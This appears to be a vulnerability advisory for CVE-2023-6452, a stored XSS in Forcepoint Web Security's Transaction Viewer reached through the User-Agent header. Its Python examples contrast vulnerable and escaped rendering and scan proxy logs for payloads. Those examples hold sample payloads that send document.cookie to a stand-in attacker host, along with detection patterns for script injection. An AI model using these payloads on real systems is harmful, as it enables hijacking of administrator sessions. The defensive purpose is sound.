Platform: other
Component: forcepoint-web-security
Fixed in: 8.5.6
CVE-2023-6452 is a stored Cross-Site Scripting (XSS) vulnerability, rated critical, in the Transaction Viewer of Forcepoint Web Security. It allows an attacker to inject script that runs in an administrator's browser, putting administrator sessions and the data visible through the console at risk. The listing gives the affected range as versions 0 through 8.5.6 and the fix as version 8.5.6; because the affected range and the fixed version overlap, confirm the exact patched build or hotfix level against the Forcepoint advisory rather than relying on the version number alone.
The flaw resides in the 'user agent' field of the Transaction Viewer, the component administrators use to inspect proxied user requests. The User-Agent value is an HTTP request header chosen entirely by the client, so any user or device whose traffic passes through the Forcepoint Web proxy can plant a payload simply by sending a request with a crafted header; no access to the management console is required. The viewer renders the stored value without neutralizing HTML, so the payload executes in the browser of whichever administrator later views that transaction. Successful exploitation could lead to hijacking of the administrator's session, manipulation of the administrative interface, or any action the console permits being carried out with the administrator's privileges. The impact is severe because the victims are administrators of a security control that sits in the path of all web traffic. Since the XSS is stored, the injected script persists in the transaction record and fires for every administrator and session that views it until the record is removed.
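The rendering pattern behind this class of flaw, and its hardened form, as an added example that is not Forcepoint's code and does not reflect how the Transaction Viewer is actually implemented: a constructed transaction record carries an attacker-chosen User-Agent value, one renderer concatenates it straight into HTML, the other HTML-escapes it, and a small parser counts the script elements and event-handler attributes a browser would execute in each result. Record layout, sample values and function names are assumptions for illustration.

```python
import html
from dataclasses import dataclass
from html.parser import HTMLParser


@dataclass
class Transaction:
    """Constructed stand-in for a proxied-request record shown in a transaction viewer."""
    client_ip: str
    url: str
    user_agent: str  # attacker-controlled: copied verbatim from the HTTP request header


# Constructed samples: one benign record and two carrying payloads in the User-Agent.
BENIGN = Transaction("10.1.2.3", "https://example.com/",
                     "Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0")
SCRIPT_UA = Transaction("10.1.2.9", "https://example.com/",
                        'Mozilla/5.0 <script>new Image().src="https://attacker.invalid/?c="+document.cookie</script>')
HANDLER_UA = Transaction("10.1.2.9", "https://example.com/",
                         "Mozilla/5.0 <img src=x onerror=alert(document.domain)>")


def render_row_vulnerable(tx: Transaction) -> str:
    """The flaw pattern: request data concatenated straight into the viewer's HTML."""
    return f"<tr><td>{tx.client_ip}</td><td>{tx.url}</td><td>{tx.user_agent}</td></tr>"


def render_row_safe(tx: Transaction) -> str:
    """Hardened form: every value is escaped for the element-content context it lands in."""
    cells = (html.escape(v, quote=True) for v in (tx.client_ip, tx.url, tx.user_agent))
    return "<tr>" + "".join(f"<td>{c}</td>" for c in cells) + "</tr>"


class ActiveContentFinder(HTMLParser):
    """Counts <script> elements and on* event-handler attributes in an HTML fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.script_tags = 0
        self.event_handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        # HTMLParser lower-cases attribute names, so a plain prefix check suffices.
        self.event_handlers += sum(1 for name, _ in attrs if name.startswith("on"))


def active_content(fragment: str) -> int:
    """Number of script elements plus event handlers a browser would execute from the fragment."""
    parser = ActiveContentFinder()
    parser.feed(fragment)
    parser.close()
    return parser.script_tags + parser.event_handlers


if __name__ == "__main__":
    for tx in (BENIGN, SCRIPT_UA, HANDLER_UA):
        print(f"{tx.user_agent[:40]!r:45} vulnerable={active_content(render_row_vulnerable(tx))} "
              f"safe={active_content(render_row_safe(tx))}")
```

The benign record renders identically either way; the two payload records yield one executable element each from the vulnerable renderer and none from the escaped one. Escaping is context-specific: `html.escape` is correct for text between tags, and a value placed inside an attribute, a URL or a script block would need the encoding appropriate to that context instead.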
CVE-2023-6452 was publicly disclosed on August 22, 2024. The low barrier to exploitation (a single crafted HTTP header sent through the proxy) combined with the critical rating makes it a candidate for automated scanning and mass injection, although a successful attack still requires an administrator to open the poisoned transaction in the viewer. No active exploitation has been publicly confirmed and the CVE is not in CISA's KEV catalog; deployments that have not applied the fix nonetheless remain exposed.
Exploit Status
EPSS: 0.18% (39th percentile)
CISA SSVC: not provided
CVSS Vector: not provided
The primary mitigation for CVE-2023-6452 is to upgrade Forcepoint Web Security to the fixed 8.5.6 build without delay. Where that is not immediately possible, interim measures reduce exposure but do not remove the flaw. The User-Agent header is client-supplied, so 'input validation' can only be applied at the proxy boundary or an upstream Web Application Firewall (WAF), by rejecting or normalizing headers that contain HTML metacharacters or script markers; expect this to break some legitimate but unusual user-agent strings, so alert on matches before switching to blocking. Restricting the management console to a small set of administrators on hardened workstations limits who can be targeted. The real fix, context-aware output encoding in the Transaction Viewer, is only available through the vendor update. After upgrading, verify in a controlled test with authorization: send a request through the proxy with a harmless, unique marker string containing angle brackets in the User-Agent (not a live payload), open that transaction in the viewer, and confirm the marker is displayed as literal text rather than interpreted as markup.
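A detection pass over proxy access logs and the post-upgrade check described above, as an added example that is not part of the original page and not a Forcepoint feature. It assumes the logs can be exported in a combined-log-format layout with the User-Agent as the last quoted field (the real Forcepoint export layout differs; adjust the regular expression to match); the log lines, address ranges and pattern list are constructed for illustration.

```python
import html
import re

# Constructed sample access-log lines in combined log format. The final quoted
# field is the User-Agent the client sent; lines 3 and 4 carry XSS payloads.
SAMPLE_LOG = """\
10.1.2.3 - alice [22/Aug/2024:10:00:01 +0000] "GET https://example.com/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/126.0 Safari/537.36"
10.1.2.4 - bob [22/Aug/2024:10:00:02 +0000] "GET https://example.com/api HTTP/1.1" 200 128 "-" "curl/8.4.0"
10.1.2.9 - - [22/Aug/2024:10:00:03 +0000] "GET https://example.com/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 <script src=https://attacker.invalid/x.js></script>"
10.1.2.9 - - [22/Aug/2024:10:00:04 +0000] "GET https://example.com/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 <img src=x onerror=fetch('https://attacker.invalid/'+document.cookie)>"
"""

# Combined log format: ip ident user [timestamp] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructs that have no place in a legitimate User-Agent string. Tune this
# list against your own traffic before blocking on it rather than alerting.
SUSPICIOUS = [
    ("html_tag", re.compile(r"<\s*/?\s*[a-z!]", re.I)),
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("js_uri", re.compile(r"javascript\s*:", re.I)),
]


def parse_line(line: str):
    """Return the named fields of one log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_user_agent(ua: str) -> list:
    """Names of the suspicious patterns found in a User-Agent value (empty if clean)."""
    return [name for name, rx in SUSPICIOUS if rx.search(ua)]


def find_suspicious(log_text: str) -> list:
    """(client_ip, user_agent, reasons) for every line whose User-Agent looks like a payload."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify_user_agent(rec["ua"])
        if reasons:
            hits.append((rec["ip"], rec["ua"], reasons))
    return hits


def marker_rendered_safely(viewer_html: str, marker: str) -> bool:
    """Post-upgrade check: the marker sent in the User-Agent must appear in the
    viewer's HTML only in escaped form, never as raw markup."""
    return marker not in viewer_html and html.escape(marker, quote=True) in viewer_html


if __name__ == "__main__":
    for ip, ua, reasons in find_suspicious(SAMPLE_LOG):
        print(f"{ip:12} {','.join(reasons):24} {ua}")
    marker = "<cve-2023-6452-check>"
    print("safe" if marker_rendered_safely("<td>&lt;cve-2023-6452-check&gt;</td>", marker) else "unsafe")
```

Running the scan on the constructed log flags only the two requests from 10.1.2.9. For the verification step, fetch the viewer page for the test transaction from an authenticated admin session and pass its body and the marker you sent to `marker_rendered_safely`; a `False` result means the value is still reaching the page unencoded.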
Update Forcepoint Web Security to version 8.5.6 or later. This update corrects the stored XSS vulnerability in the Transaction Viewer. Refer to the Forcepoint article for detailed instructions on how to perform the update.
CVE-2023-6452 is a critical stored XSS vulnerability in the Transaction Viewer of Forcepoint Web Security; an attacker injects script through the User-Agent header of a request that passes through the proxy, and it executes when an administrator views the transaction.
Yes, if you run Forcepoint Web Security at any version up to 8.5.6 without the fix, you are potentially affected; check your exact build against the Forcepoint advisory, since the fixed release carries the same version number as the top of the affected range.
Upgrade Forcepoint Web Security to the fixed 8.5.6 build or later to resolve the vulnerability. Header filtering at the proxy boundary or a WAF, and tighter access to the management console, are temporary mitigations only.
No active exploitation has been publicly confirmed, but the severity and the ease of planting the payload (a single crafted request header) make unpatched deployments a realistic target.
Refer to the official Forcepoint security advisory for detailed information and updates: [https://www.forcepoint.com/security-advisories](https://www.forcepoint.com/security-advisories)